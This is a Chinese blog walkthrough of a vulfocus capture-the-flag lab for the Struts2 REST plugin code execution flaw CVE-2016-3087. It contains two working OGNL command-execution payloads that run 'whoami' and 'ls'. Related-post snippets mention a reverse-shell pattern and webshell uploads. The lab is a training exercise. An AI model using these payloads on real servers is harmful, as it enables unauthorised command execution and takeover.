vulfocus——struts2代码执行(CVE-2016-3087)

最新推荐文章于 2024-04-24 10:33:50 发布
原创 最新推荐文章于 2024-04-24 10:33:50 发布 · 976 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet

本文详细介绍了Struts2框架中的一个安全漏洞,该漏洞存在于Struts2.3.20到2.3.28版本(除了2.3.20.3和2.3.24.3),当启用REST插件且DynamicMethodInvocation配置为true时,攻击者可能通过恶意OGNL表达式执行任意代码。文章提供了漏洞复现步骤,包括访问特定的URL和使用命令执行POC,强调了这一漏洞对服务器安全的严重威胁。

描述

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

Struts 2.3.20 - Struts Struts 2.3.28 (除2.3.20.3及2.3.24.3)版本,使用REST插件情况下,若启用了Dynamic Method Invocation,可能导致通过恶意表达式在服务器端执行任意代码。

复现

1.打开靶场环境 ,访问web页面

 2.有回显poc(命令执行)

%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=whoami

%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=ls

3.用工具来获取flag

struts2 代码执行CVE-2018-11776)
qq_32445755的博客
03-08 955
影响版本 Struts<= Struts 2.3.34, Struts 2.5.16 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。路径为/struts2-showcase/ ...
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 700
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
vulfocus-struts2 命令执行 (CVE-2016-3081)
Fanny0602的博客
06-16 2147
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
struts2部分代码
09-01
struts2部分代码
struts2 代码执行 (CVE-2020-17530)
yxr520yj的博客
09-27 1272
struts在某些情况下可能存在OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行。OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行漏洞。#struts2代码执行漏洞。
struts源代码阅读(struts 的执行)
javaGirl专栏
10-30 598
第二篇 struts的执行(struts-1.1版)本篇详细介绍struts在初始化之后是如何处理一个请求,并返回数据的。这里最核心的类是RequestProcessor以及RequestUtils。RequestProcessor类通过RequestDispatcher实现页面的跳转,而RequestProcessor负责处理request中传来的请求信息,存放到FormBeanConfig中,
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 1171
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行。Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
vulfocus——dedecms文件上传(CVE-2019-8933)
m0_62063669的博客
09-14 979
Desdev DedeCMS(织梦内容管理系统)是一套基于PHP的开源内容管理系统(CMS),具有内容发布、内容管理、内容编辑和内容检索等功能。远程攻击者可在通过添加新模板时,将文件名../index.html更改成../index.php,利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。3. 模板=>默认模板管理=>新建模板。4.写入一句话木马,然后保存。6.用蚁剑连接一句话木马。5.访问一下这个文件。
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 1112
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令。
vulfocus 靶场struts2 代码执行CVE-2020-17530)
最新发布
没有故事
04-24 1918
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
struts2实例代码
08-09
里面的方法包括三种不同的方法实现ajax,以及对获得的变量的处理,属于一篇博客的源码,配合源码食用效果更佳
struts2源代码
11-29
struts2源代码,亲测可用,欢迎下载,共同交流。 为什么没有0资源分!
struts2 项目源代码
01-11
北大青鸟 struts2 项目源代码 值得一看
最简单的Struts2的代码示例
11-30
最简单的Struts2的代码示例,我的空间有详细说明~~~~~~~~~~~~~~~~~~~~~~~~~~~
Struts2源代码项目
04-09
NULL 博文链接:https://samsongbest.iteye.com/blog/1634373
struts2示例代码-struts2的配置
分享
08-09 595
这篇文章是关于struts2的配置,
Struts2 源代码学习 (一)
weixin_34310785的博客
04-06 125
Struts执行流程图如下所示: 系统 : 1,整体的组织体结构 2,执行流程 3,特性 执行流程: 1,一个初始的请求到达了servlet容器 2,这个请求要通过一系列的过滤链 3,这个链包括ActionContextCleanUp过滤器,这个过滤器用于当集成了SiteMesh Plugin技术时, 4,接着FilterDispatcher被调...
struts2 代码执行CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 5083
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
struts2代码执行漏洞
weixin_30530939的博客
01-09 110
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞,具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt 还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。 影响版本是2.3.1和2.3.1之前的版本 解决办法是升级...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值